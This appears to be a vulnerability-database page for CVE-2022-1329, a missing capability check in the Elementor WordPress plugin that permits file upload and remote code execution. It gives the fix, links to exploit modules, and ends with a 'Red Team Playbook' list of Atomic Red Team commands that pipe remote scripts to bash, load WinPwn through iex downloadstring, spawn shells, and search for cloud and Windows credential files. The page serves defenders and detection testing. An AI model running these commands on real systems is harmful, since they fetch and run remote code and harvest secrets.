CVE-2022-1329
Overview
This vulnerability is an authorization bypass in the Elementor Website Builder plugin for WordPress caused by a missing capability check in the AJAX action handlers within the onboarding module. Specifically, the flaw resides in the ~/core/app/modules/onboarding/module.php file, where several AJAX actions lack proper permission validation, allowing unauthorized users with limited privileges to invoke sensitive functions. The affected component is the onboarding module responsible for site setup and configuration tasks.
Vulnerability Description
The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file that make it possible for attackers to modify site data in addition to uploading malicious files that can be used to obtain remote code execution, in versions 3.6.0 to 3.6.2.
Impact
An attacker with at least low-level authenticated access can exploit this vulnerability to modify site data and upload malicious files, which can be leveraged to execute arbitrary code remotely on the server. This enables full site compromise, including data theft, defacement, or persistent backdoor installation. The attack requires network access and authenticated user privileges (PR:L) but no user interaction (UI:N). The CVSS vector indicates high confidentiality, integrity, and availability impact (C:H/I:H/A:H).
Solution
Users should upgrade Elementor Website Builder to version 3.6.3 or later, where the missing capability checks in the onboarding module's AJAX handlers have been implemented. The patch is detailed in the WordPress plugin repository changeset 2708766 and documented by Wordfence and Plugin Vulnerabilities. Administrators are advised to consult the official plugin update notes and apply the update promptly to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The Elementor Website Builder plugin for WordPress has a significant vulnerability stemming from a lack of proper capability checks in its AJAX handling mechanism. Specifically, this weakness resides in the onboarding module, where unauthorized users can execute various AJAX actions without appropriate authentication or authorization. This oversight allows attackers to manipulate site data and upload malicious files, potentially leading to remote code execution. The absence of necessary checks means that any user, regardless of their role or permissions, can exploit these actions, thereby compromising the integrity and security of the affected WordPress installations.
Attack vectors for this vulnerability are particularly concerning due to the ease with which they can be exploited. An attacker could leverage social engineering tactics to gain access to a site or use automated scripts to send crafted requests to the vulnerable AJAX endpoints. Once access is gained, the attacker can modify site configurations, alter content, or upload malicious scripts that can be executed on the server. This could lead to a full compromise of the website, allowing the attacker to deploy backdoors, steal sensitive information, or use the site for further attacks, such as distributing malware or phishing campaigns. The potential for exploitation is exacerbated by the widespread use of the Elementor plugin, which is popular among WordPress users for its ease of use and extensive features.
The real-world impact of this vulnerability can be severe, particularly for businesses that rely on their online presence for operations and customer engagement. A successful exploitation could lead to significant data breaches, loss of customer trust, and financial repercussions due to downtime or remediation efforts. Furthermore, the implications extend beyond the immediate site; compromised websites can serve as launchpads for attacks on other systems, creating a cascading effect that could impact other organizations and users. For businesses, the reputational damage and potential legal liabilities associated with data breaches can be substantial, making this vulnerability a critical concern.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. Regularly updating the Elementor plugin to the latest version is essential, as developers typically release patches to address known vulnerabilities. Additionally, employing a web application firewall (WAF) can help filter out malicious requests before they reach the application. Monitoring logs for unusual AJAX requests or unauthorized changes to site data can also aid in early detection of potential exploitation attempts. Furthermore, implementing strict user role management and ensuring that only authorized personnel have access to critical site functions can significantly reduce the attack surface.
In conclusion, the vulnerability within the Elementor Website Builder plugin poses a serious threat to WordPress sites, enabling unauthorized actions that can lead to severe consequences. The ease of exploitation, combined with the potential for widespread impact, underscores the necessity for vigilant security practices. Organizations must prioritize timely updates, robust monitoring, and strict access controls to safeguard their online assets against such vulnerabilities. By adopting a proactive security posture, businesses can mitigate risks and protect themselves from the evolving landscape of cyber threats.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Elementor | Website Builder | All |
cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Wordpress Plugin Elementor Authenticated Upload Remote Code Execution
exploits/multi/http/wp_plugin_elementor_auth_upload_rce
|
Ramuel Gall, AkuCyberSec, h00die | Unknown | php | View |
GitHub PoCs (7)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
AkuCyberSec/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit
|
AkuCyberSec | 23 | 6 | 2022-04-15 | View |
|
mcdulltii/CVE-2022-1329
WordPress Elementor 3.6.0 3.6.1 3.6.2 RCE POC
|
mcdulltii | 16 | 7 | 2022-04-17 | View |
|
Grazee/CVE-2022-1329-WordPress-Elementor-RCE
|
Grazee | 4 | 1 | 2022-04-20 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
AgustinESI/CVE-2022-1329
|
AgustinESI | 0 | 0 | 2024-10-11 | View |
|
phanthibichtram12/CVE-2022-1329
|
phanthibichtram12 | 0 | 0 | 2024-06-21 | View |
|
dexit/CVE-2022-1329
The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized execution of several AJAX actions due t...
|
dexit | 0 | 0 | 2023-01-29 | View |
Threat Feed
2 eventsProof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-1329 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/ |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/2708766/elementor/trunk/core/app/modules/onboarding/module.php |
| pluginvulnerabilities.com |
GitHub CVE
|
https://www.pluginvulnerabilities.com/2022/04/12/5-million-install-wordpress-plugin-elementor-contains-authenticated-remote-code-execution-rce-vulnerability/ |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/168615/WordPress-Elementor-3.6.2-Shell-Upload.html |